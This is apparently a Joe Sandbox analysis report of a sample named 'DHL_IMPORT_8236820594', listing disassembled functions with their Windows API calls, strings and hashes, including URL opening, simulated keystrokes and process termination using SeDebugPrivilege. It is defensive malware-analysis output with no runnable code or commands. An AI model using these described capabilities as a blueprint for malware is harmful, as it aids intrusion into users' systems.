SetEvent.KERNEL32(?), ref: 0055C1A9

Part of subcall function 0055C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0055C272
Part of subcall function 0055C253: GetLastError.KERNEL32 ref: 0055C322
Part of subcall function 0055C253: SetEvent.KERNEL32(?), ref: 0055C336
Part of subcall function 0055C253: InternetCloseHandle.WININET(00000000), ref: 0055C341

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 8520c4355a5ac0f2d4d8904f9c671c9b404714fabb877b345f84470b1e53041e
Instruction ID: 8802459e8c53a41bad0020ae9fce56d7f35d2640efdf17fd3a5d32cecd1c1964
Opcode Fuzzy Hash: 8520c4355a5ac0f2d4d8904f9c671c9b404714fabb877b345f84470b1e53041e
Instruction Fuzzy Hash: FC318279100701AFDB219FA5EC54A667FF9FF54302F00441EF99A86611D730E858EB60

Function 005425A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00543A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00543A57
Part of subcall function 00543A3D: GetCurrentThreadId.KERNEL32 ref: 00543A5E
Part of subcall function 00543A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005425B3), ref: 00543A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 005425BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005425DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005425DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 005425E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00542601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00542605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0054260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00542623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00542627

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 5de2fb4ab57956772e1368d6fdee7a575dc70a83fb9a951f5afa3c14a9b93a40
Instruction ID: 30e0acbf4d5fa06a802e40f0b6be51da6880d04fc5b029494f222ca32c4c6861
Opcode Fuzzy Hash: 5de2fb4ab57956772e1368d6fdee7a575dc70a83fb9a951f5afa3c14a9b93a40
Instruction Fuzzy Hash: 0B01D830390210BBFB1067699C8EF993F59EF9EB15F500015F318AE0E1C9E11484EA69

Function 00541803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00541449,?,?,00000000), ref: 0054180C
HeapAlloc.KERNEL32(00000000,?,00541449,?,?,00000000), ref: 00541813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00541449,?,?,00000000), ref: 00541828
GetCurrentProcess.KERNEL32(?,00000000,?,00541449,?,?,00000000), ref: 00541830
DuplicateHandle.KERNEL32(00000000,?,00541449,?,?,00000000), ref: 00541833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00541449,?,?,00000000), ref: 00541843
GetCurrentProcess.KERNEL32(00541449,00000000,?,00541449,?,?,00000000), ref: 0054184B
DuplicateHandle.KERNEL32(00000000,?,00541449,?,?,00000000), ref: 0054184E
CreateThread.KERNEL32(00000000,00000000,00541874,00000000,00000000,00000000), ref: 00541868

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: eb066896954d16584672f7c4a38b8fcd1597f2ff42c42d1c91601d7d0fd7fb90
Instruction ID: 2bd7fbe54acfc1b576121e9d46875bd704c97255d5b62e60b02bbf388d5fb2b9
Opcode Fuzzy Hash: eb066896954d16584672f7c4a38b8fcd1597f2ff42c42d1c91601d7d0fd7fb90
Instruction Fuzzy Hash: 1A01BF75240304BFE710AF65EC4DF573F6CEB99B11F404425FA05DB191CA709844EB20

Function 0056A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0054D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0054D501
Part of subcall function 0054D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0054D50F
Part of subcall function 0054D4DC: CloseHandle.KERNEL32(00000000), ref: 0054D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0056A16D
GetLastError.KERNEL32 ref: 0056A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0056A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0056A268
GetLastError.KERNEL32(00000000), ref: 0056A273
CloseHandle.KERNEL32(00000000), ref: 0056A2C4

Strings

SeDebugPrivilege, xrefs: 0056A18F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: d4a413b4b2cf6ae9ec0567ee135aed424d30e054448af197739db80eaaa0568e
Instruction ID: c7e44646b56f9bc6d6a017af038e2ed7a8e3196bf3836ae2c638c9251c6bd454
Opcode Fuzzy Hash: d4a413b4b2cf6ae9ec0567ee135aed424d30e054448af197739db80eaaa0568e
Instruction Fuzzy Hash: A2617B342042429FD720DF19C494F16BFA1BF54318F54849CE46A9B7A3C776EC89CB92

Function 00573886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00573925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0057393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00573954
_wcslen.LIBCMT ref: 00573999
SendMessageW.USER32(?,00001057,00000000,?), ref: 005739C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 005739F4

Strings

SysListView32, xrefs: 005738F7

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: e02e06d611c9a816d5eac6c6fd838dfe3675e1a1040a6843002473cd67bcbd5c
Instruction ID: 99795a86e909f06d0555ccb3021d4c59fd7703201bf8e2149557db46bc49d703
Opcode Fuzzy Hash: e02e06d611c9a816d5eac6c6fd838dfe3675e1a1040a6843002473cd67bcbd5c
Instruction Fuzzy Hash: 6641D671A00219ABDB219F64DC49BEA7FA9FF08360F10452AF558E7281D3719D84EB90

Function 0054BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0054BCFD
IsMenu.USER32(00000000), ref: 0054BD1D
CreatePopupMenu.USER32 ref: 0054BD53
GetMenuItemCount.USER32(00C25C08), ref: 0054BDA4
InsertMenuItemW.USER32(00C25C08,?,00000001,00000030), ref: 0054BDCC

Strings

2, xrefs: 0054BD37
0, xrefs: 0054BCA8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: aac99908f0d226ff56f2e24e5bf67355e733bf43fd163c98147295b5d4d1520a
Instruction ID: 9190e23902b14b7fab2f8fc1adf5eea70f237d16337ac03d4d16ff766b7f49f0
Opcode Fuzzy Hash: aac99908f0d226ff56f2e24e5bf67355e733bf43fd163c98147295b5d4d1520a
Instruction Fuzzy Hash: ED519C70E002069BEF20CFA8D888BEEBFF8BF95318F144599E4159B290D771D945CB61

Function 00502D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00502D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00502D53
_ValidateLocalCookies.LIBCMT ref: 00502DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00502E0C
_ValidateLocalCookies.LIBCMT ref: 00502E61

Strings

&HP, xrefs: 00502DFE, 00502E07, 00502E18
csm, xrefs: 00502DF6

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &HP$csm
API String ID: 1170836740-658142809
Opcode ID: ec7fd49868a7dcad7e84a6304a7287c2663cfae9521c669558cc3a65b3e595b4
Instruction ID: c08b5866088515001ac70c868632f74f0289d46570067e9c70241ebe29443edf
Opcode Fuzzy Hash: ec7fd49868a7dcad7e84a6304a7287c2663cfae9521c669558cc3a65b3e595b4
Instruction Fuzzy Hash: DD418635A01209ABCF10DF68C85DAAEBFB9BF45314F148155E814AB3D2D7719E06CBD0

Function 0054C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0054C913

Strings

blank, xrefs: 0054C895
stop, xrefs: 0054C8E4
info, xrefs: 0054C8B4
question, xrefs: 0054C8CC
warning, xrefs: 0054C8FC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 7a45d95b725eac878176058a7de9034b478ab2544a6185a735d67f853c0dba57
Instruction ID: f6a3032247117bdf4d4d458ea1fac26776e3319a3c89581e4505b3803183467b
Opcode Fuzzy Hash: 7a45d95b725eac878176058a7de9034b478ab2544a6185a735d67f853c0dba57
Instruction Fuzzy Hash: 4C11EB3278A307BAE7056B549C83CEE6F9CFF56758B10042EF500A61C2EB746D405664

Function 0054ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0054ED2A
_wcslen.LIBCMT ref: 0054ED3B
_wcslen.LIBCMT ref: 0054ED79
_wcslen.LIBCMT ref: 0054EDAF
_wcslen.LIBCMT ref: 0054EDDF
_wcslen.LIBCMT ref: 0054EDEF
_wcslen.LIBCMT ref: 0054EE2B
_wcslen.LIBCMT ref: 0054EE5A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 2b90e25dfc64327cab81a80c6751d37c22c23247a5db967f38a2f22e96bb320a
Instruction ID: f9d6ec7e34f7fafa78fd83de99bccf1d2b22f67ec88faea50a582b94ffab4316
Opcode Fuzzy Hash: 2b90e25dfc64327cab81a80c6751d37c22c23247a5db967f38a2f22e96bb320a
Instruction Fuzzy Hash: 8541A369C1011A75CB11EBF4888E9CFBBBCBF85310F508866E514E3162FB34D265C7A5

Function 004FF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0053682C,00000004,00000000,00000000), ref: 004FF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0053682C,00000004,00000000,00000000), ref: 0053F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0053682C,00000004,00000000,00000000), ref: 0053F454

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 33b757e28ba444f86a7c0a87bf5dc04c253f622c6b547491d9f1a73d0199839b
Instruction ID: 62b7119aaa68a2b34b7b388f1a0d182458189f0a64bf95a4cdde4122731eeae4
Opcode Fuzzy Hash: 33b757e28ba444f86a7c0a87bf5dc04c253f622c6b547491d9f1a73d0199839b
Instruction Fuzzy Hash: 49413D71604688BBC7388B29D888F3B7F91BF55314F54443EE24B52670C6BAA889DB15

Function 00572D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00572D1B
GetDC.USER32(00000000), ref: 00572D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00572D2E
ReleaseDC.USER32(00000000,00000000), ref: 00572D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00572D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00572D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00575A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00572DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00572DE1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e13526d97df7f1ca12199e04b29ef0f3db67547e64dbb749760e3218ff017b56
Instruction ID: d5ad908612cd9037415992bc288749e5fd4f09852363d3cf3006abdc24a310d1
Opcode Fuzzy Hash: e13526d97df7f1ca12199e04b29ef0f3db67547e64dbb749760e3218ff017b56
Instruction Fuzzy Hash: EB318D72201214BFEB214F54AC89FEB3FA9FB19711F044059FE0C9A291C6759C81EBA0

Function 00545622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00545637
_memcmp.LIBVCRUNTIME ref: 00545659
_memcmp.LIBVCRUNTIME ref: 00545671
_memcmp.LIBVCRUNTIME ref: 00545684
_memcmp.LIBVCRUNTIME ref: 0054569E
_memcmp.LIBVCRUNTIME ref: 005456B1
_memcmp.LIBVCRUNTIME ref: 005456C9
_memcmp.LIBVCRUNTIME ref: 005456E4

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9ad2901bf0bd65ba9e0edeade2599b24af0ae3288e8ec48994b6e558773e03db
Instruction ID: 695fc5456f9c055433e882f65b3d344da2917ceb019b793be1dd4b10a2fa579f
Opcode Fuzzy Hash: 9ad2901bf0bd65ba9e0edeade2599b24af0ae3288e8ec48994b6e558773e03db
Instruction Fuzzy Hash: 4521F671644E0A7BD21596209E86FFE3F5CBF61388F454430FD0A9A683F720ED11D6AA

Function 00564FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00565007
NULL Pointer assignment, xrefs: 0056502E, 00565383

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 6ff4cdeab1c43014d42a953ce9d60721e2aaebd8fe8aca1a5c080eccf8a06b36
Instruction ID: 0dc7b00efc1558f6395df072206e28969980ad41293c0c55c55b935706116cd7
Opcode Fuzzy Hash: 6ff4cdeab1c43014d42a953ce9d60721e2aaebd8fe8aca1a5c080eccf8a06b36
Instruction Fuzzy Hash: D3D1E171A4060AAFDF10CFA8C885FAEBBB5FF48354F148469E915AB281E770DD45CB90

Function 00521522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 005215CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00521651
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005216E4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005216FB

Part of subcall function 00513820: RtlAllocateHeap.NTDLL(00000000,?,005B1444,?,004FFDF5,?,?,004EA976,00000010,005B1440,004E13FC,?,004E13C6,?,004E1129), ref: 00513852

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00521777
__freea.LIBCMT ref: 005217A2
__freea.LIBCMT ref: 005217AE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: bca80739351f08de60ed32ea9eea84ef9b65dce5d75c1fb3ee957674c89c3ec5
Instruction ID: 3c9dbbb3cb967105061f4e9b93c2e43170de000db6460e84fa82c560c9428592
Opcode Fuzzy Hash: bca80739351f08de60ed32ea9eea84ef9b65dce5d75c1fb3ee957674c89c3ec5
Instruction Fuzzy Hash: 8691C472F00A265ADB208E64E985AEF7FB5FFA6310F180669E805E71C1D725DD40CBA4

Function 00564523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00564648
VariantInit.OLEAUT32(?), ref: 00564749
VariantClear.OLEAUT32(?), ref: 00564753
VariantClear.OLEAUT32(?), ref: 005647B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0056472C
Null Object assignment in FOR..IN loop, xrefs: 005645D8, 00564706, 005647BE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: e45248fa8752f2b66a628e702ffd6339a30fab7354540bc4f93191fe2d9eaa8e
Instruction ID: 6237c8f6f98fa1d7f9dba67df9099eb6d9bc729671f345f5bc221ffb29f4d295
Opcode Fuzzy Hash: e45248fa8752f2b66a628e702ffd6339a30fab7354540bc4f93191fe2d9eaa8e
Instruction Fuzzy Hash: 01917B71A00219ABDF20CFA5D888FAEBFB8FF46714F108559F515AB281D7709946CFA0

Function 00551187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0055125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00551284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 005512A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005512D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0055135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005513C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00551430

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
